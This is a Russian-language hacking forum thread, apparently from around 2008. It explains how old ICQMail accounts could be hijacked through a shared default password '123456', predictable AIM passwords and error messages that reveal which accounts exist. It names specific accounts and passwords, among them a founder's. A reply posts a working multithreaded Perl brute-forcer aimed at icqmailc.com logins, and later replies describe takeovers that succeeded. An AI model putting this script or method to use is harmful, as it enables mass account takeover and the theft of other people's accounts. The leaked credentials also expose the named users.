Существует три вида известного сервиса «ICQMAIL» (первые два уже в прошлом): * Старейший icqmail - http://company.icq.com/info/press/press_release29.html * Прошлый icqmail - http://www.mail2world.net/net/company/pr11-22-2004.asp * Текущий icqmail (бета) - http://www.icqmail.com/ В ноябре 2004 был найден баг когда ICQ-пользователь использовал старейший ICQ Mail и регистрировал ICQMail-аккаунт, при этом регистрировался также названный AIM-ник (например при регистрации [email protected], регистрировался AIM-ник «user23456»). Потому что AIM старее, чем ICQMail и потому что множество AIM-ников уже были зарегистрированы, пользователям ICQ сложно было выбрать себе свободный для регистрации ICQMail. Некоторые люди сделали «брутфорс» и было найдено то, что некоторые из старых ICQMail-аккаунтов имеют уникальный общий пароль — «123456». Было возможно войти в аккаунт ICQMail-аккаунт одного из основателей ICQ (Yair Goldfinger — ICQ# 80000) с паролем: 123456 (сейчас это доступно на icqmailc.com). Хакер получил возможность взломать ICQMail (двумя различными способами) через универсальный пароль (данный метод работает на некоторых аккаунтах) или взломать [email protected] который имеет панель управления системы ICQMail (метод работающий на всех ICQMail аккаунтах) в опциях которой, была возможность возвращать ранее упомянутые автоматически созданные AIM-ники, пароли которых совпадали с ICQMail аккаутом привязанным к номеру ICQ. Пароли AIM-ников были равны «p_icqпароль» (например, если на AIM-нике пароль был «p_miracle», пароль на номере ICQ был: miracle). Взломщику нужно было лишь удалить «p_» из пароля к аккаунту AIM для взлома ICQ аккаунта. Большинство номеров было присоединено к ICQMail, то есть присоединенные к старым ICQMail-аккаунтам (old style ICQMails). Большая часть таких аккаунтов имеет универсальный пароль «123456». Таким образом, влом их был возможен через страницу восстановления пароля AIM-аккаунта — http://www.aim.com/help_faq/forgot_p...d/password.adp 6-го сентября 2008 года много пользователей ICQMail получили данное письмо от администрации ICQ: И в конце октября 2008 года последний вид ICQMail был запушен (доступен всем он стал немного познее). Новый ICQMail представлял из себя AIMMail. Новый ICQMail был более защищенным потому, что сделан на так-называемой «karma» проверкой ICQ пароля. Первые два ICQMail системы были потерянны, но много пользователей были не довольны потерей содержимого их ICQMail-аккаунтов и администрация ICQ написало следующее сообщение http://www.icq.com/help/view_faq.php?faq_id=8024: «Ваши старые E-Mail не перенесены в новую ICQmail систему. Вы можете видеть старые E-Mail адреса в старой системе www.icqmailc.com, но вы не можете отправлять или получать письма с них.» Таким образом, предыдущий вид ICQMail доступен на сайте www.icqmailc.com в конце октября. Аккаунты ICQMail на этом сайте совпадают с паролями на предыдущих версиях ICQMail и не совпадают с текущими паролями нового ICQMail. Как было упомянуто много аккаунтов предыдущего ICQMail имеют универсальный пароль «123456» и они имею такой-же пароль на www.icqmailc.com. Существующий «123456» баг на www.icqmailc.com мог быть использован взломщиками, которые могут сделать сканер, который может проверять какие ICQ-аккаунты имеют ICQMail и какие из них имеют универсальный пароль. Метод сканирования очень простой: номер ICQ может быть введён в поле «ICQMail ID». ICQMail не присоединён если появляется ошибка «Please enter a valid username.». Если к номеру присоединен ICQMail-аккаунт и пароль не «123456», текст ошибки будет содержать «Please enter the correct password for this account.». Иначе, если к номеру ICQ присоединён ICQMail-аккаунт и пароль к нему «123456», то сканер может получить имя ICQMail-аккаунта продолжая вход в систему. Для примера ICQMail ID: 111111, Пароль: 123456, имя аккаунта: [email protected] Часто имя аккаунта ICQMail (или первые 8 символов) совпадает с паролем с паролем номера ICQ к которому ICQMail привязан. Для примера: ICQMailID: 203007, Пароль: 123456. Полученный E-Mail: [email protected], номер ICQ: 203007, пароль: hogemp (конечно сейчас пароль уже другой, но я был информирован что пароль в точности соответствовал) Простое сканирование аккаунтов icqmailc.com и проверка паролей сделанное хакером может привести к массовому взлому номеров ICQ. Наверное хорошая идея для исправления данного бага: работа сканера будет не возможна, если администрация ICQ заблокирует вход в icqmailc с номерами ICQ введёнными в ICQMail ID и сделает доступным вход только по E-Mail. Список ICQMail-аккаунтов 5-6 знаков. C вами были [ e l i T e ], flabber и .fry\ sp/ Кул что сказать)
forum.asechka.ru/showthread.php?p=489677 + мой многопоточний брутер ) PHP: #! /usr/bin/perl -w use IO::Socket; use warnings; use threads; use threads::shared; use Fcntl ':flock'; #=====] eLwaux [================================================================== #================================================================================ my $iCQ : shared = 80000; my $threads = 3; #======================== #== start.. ======= #================================================================================ open (FILE, '<icqmailc.com.pass.txt') || die(" [-] icqmailc.com.pass.txt not found!\n"); my @pas : shared = <FILE>; chomp(@pas); close(FILE); $time = time; printf " [ ] started [".localtime()."]\n\n"; for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } $time = time-$time; printf "\n [ ] finished [".localtime()."]\n"; printf " [i] time elapsed: $time sec\n"; <stdin>; sub Brut{ while($iCQ<999999) #iCQ num #999.999.999 { {lock($iCQ);$num=$iCQ;$iCQ++;} foreach my $psw(@pas){ $post = 'faction=login&domain=icqmail.com&username='.$num.'&password='.$psw.'&RememberMe=on'; $header = "POST http://icqmailc.com/default.asp HTTP/1.1\r\n". "Host: icqmailc.com\r\n". "User-Agent: icq.icq (icq)\r\n". "Referer: http://icqmailc.com\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Cookie: temp=; lang=en; domaincode=icq; remember%5Fme=secure=&Domain=icqmail%2Ecom&autologin=&Username=".$num."&value=TRUE; M2W3=height=800&width=1280; HasSideAd=no; MBXPercent=0%2E7; customguitemp=; welcome=\r\n". "Content-Length: ".length($post)."\r\n\r\n". "$post\r\n\r\n"; my $sock = sock(); print $sock $header; while(my $answer = <$sock>){ if ($answer=~/Content-Length: (\d{1,9})/) { if ($1<1000) {print ' [+] '.$num.' : '.$psw."\n";s2f('result.txt','++ '.$num.':'.$psw."\n");} else {print ' - '.$num.' : '.$psw."\n";s2f('result.txt','- '.$num.':'.$psw."\n");} last; } if($answer=~/<\/html>/){last;} } sleep(0.5); close($sock); } } } #============================================================================= #============================================================================= sub s2f { open(FILE, '>>'.$_[0]); print FILE $_[1]; close(FILE); } #create new socket connection sub sock { my $sock; do { $sock = new IO::Socket::INET ( PeerAddr => 'icqmailc.com', PeerPort => 80, PeerProto => 'tcp', TimeOut => 10 ) or print "[-] connection error!"; } while (!$sock); return $sock; } #============================================================================= #=============================================================================
мдэ, рабочих номерков вроде как уже не осталось, попробовал несколько нумов, пароль не подходит, хотя в мыло заходит...
а я попробывал по другому взял бузу этих мыл и про бурул .. например 10101 - [email protected] я взял 10101;edithpniel убрал посли сабаки все.. разделил точкой запятой и запустил брутку... вобще открылось 6-ть шестерок... правдо некрасивых ну всеравно 6-ки! пробрутил еще правдо не все... список большой!
